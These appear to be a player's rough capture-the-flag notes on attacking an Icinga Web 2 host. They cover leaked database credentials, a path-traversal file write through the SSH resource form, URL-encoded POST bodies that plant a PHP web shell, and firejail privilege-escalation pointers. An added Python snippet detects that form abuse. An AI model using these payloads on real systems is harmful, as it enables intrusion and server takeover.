i hate this fucking box so much
Icinga Web 2 LFI CVE
[icingaweb2]
type = "db"
db = "mysql"
host = "localhost"
dbname = "icingaweb2"
username = "matthew"
password = "IcingaWebPassword2023"
use_ssl = "0"
we need to create a PEM-format SSH key
ssh-keygen -t rsa -m PEM
the user field is the local file write primitive (eg: ../../../../../../tmp/matthew)
this will output it at /tmp/matthew
(http://icinga.cerberus.local:8080/icingaweb2/lib/icinga/icinga-php-thirdparty/tmp/matthew)
it takes file paths too, not just PEMs (file:///tmp/matthew in the key field)
change the module path to something we can control like /tmp
at http://icinga.cerberus.local:8080/icingaweb2/config/general
file write like this
type=ssh&name=bruh3&user=..%2F..%2F..%2F..%2F..%2F..%2Ftmp%2Fnotsussyatall3&private_key=file%3A%2F%2F%2Ftmp%2Fmatthew%00<?php+echo(%22bruh%22)%3B?>&formUID=form_config_resource
modules need a run.php (make sure we have written a legitimate SSH key first, before we do this)
type=ssh&name=bruh3&user=..%2F..%2F..%2F..%2F..%2F..%2Ftmp%2Fnotsussymoduleatall2/run.php&private_key=file%3A%2F%2F%2Ftmp%2Fmatthew%00<?php+system($_GET['cmd']);%3B?>&formUID=form_config_resource
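Added example (not from these notes, and not Icinga's own code): a small detector for the abuse of the SSH resource form described above, run over constructed POST bodies. It URL-decodes the form and flags traversal in `user`, the encoded null byte, a PHP tag and a `file://` URI in `private_key`, so the same pattern can be spotted in a web access or WAF log.

```python
import re
from urllib.parse import parse_qs

# Constructed sample POST bodies (not captured traffic), modelled on the
# /icingaweb2/config/resource form shown above: one benign, two abusive.
SAMPLE_BODIES = [
    "type=ssh&name=backup&user=nagios&private_key=-----BEGIN+RSA+PRIVATE+KEY-----"
    "&formUID=form_config_resource",
    "type=ssh&name=bruh3&user=..%2F..%2F..%2F..%2F..%2F..%2Ftmp%2Fx"
    "&private_key=file%3A%2F%2F%2Ftmp%2Fmatthew%00<?php+echo(1)%3B?>"
    "&formUID=form_config_resource",
    "type=ssh&name=ok&user=deploy&private_key=file%3A%2F%2F%2Fetc%2Fpasswd"
    "&formUID=form_config_resource",
]

# ".." as a whole path component, with either separator
TRAVERSAL = re.compile(r"(^|[\\/])\.\.([\\/]|$)")

def inspect_resource_body(body: str) -> list[str]:
    """Return reasons an SSH-resource form body looks like file-write abuse.

    Fields are URL-decoded first so encoded traversal (%2F) and the encoded
    null byte (%00) are examined in their decoded form.
    """
    fields = {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}
    if fields.get("type") != "ssh":
        return []
    user = fields.get("user", "")
    key = fields.get("private_key", "")
    reasons = []
    if TRAVERSAL.search(user):
        reasons.append("path traversal in user")
    if "\x00" in user or "\x00" in key:
        reasons.append("null byte in form field")
    if "<?php" in key.lower() or "<?=" in key:
        reasons.append("php tag in private_key")
    if key.lower().startswith("file://"):
        reasons.append("file:// uri in private_key")
    if user and not re.fullmatch(r"[A-Za-z0-9._@-]+", user):
        reasons.append("unexpected characters in user")
    return reasons

def scan(bodies):
    """Map each body index to its reasons, keeping only suspicious ones."""
    return {i: r for i, b in enumerate(bodies) if (r := inspect_resource_body(b))}

if __name__ == "__main__":
    for i, reasons in scan(SAMPLE_BODIES).items():
        print(f"body {i}: {', '.join(reasons)}")
```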
we can try the firejail privesc
www-data@icinga:/usr/share/icingaweb2/public$ firejail --help | grep version
firejail - version 0.9.68rc1
--version - print program version and exit.
License GPL version 2 or later
www-data@icinga:/usr/share/icingaweb2/public$ cat /etc/firejail/firejail.config | grep nonewprivs
# Force use of nonewprivs. This mitigates the possibility of
# force-nonewprivs no
https://github.com/advisories/GHSA-m2xv-wgqg-4gxh
POC? https://www.openwall.com/lists/oss-security/2022/06/08/10 => https://www.openwall.com/lists/oss-security/2022/06/08/10/1
just run the script on the victim and do su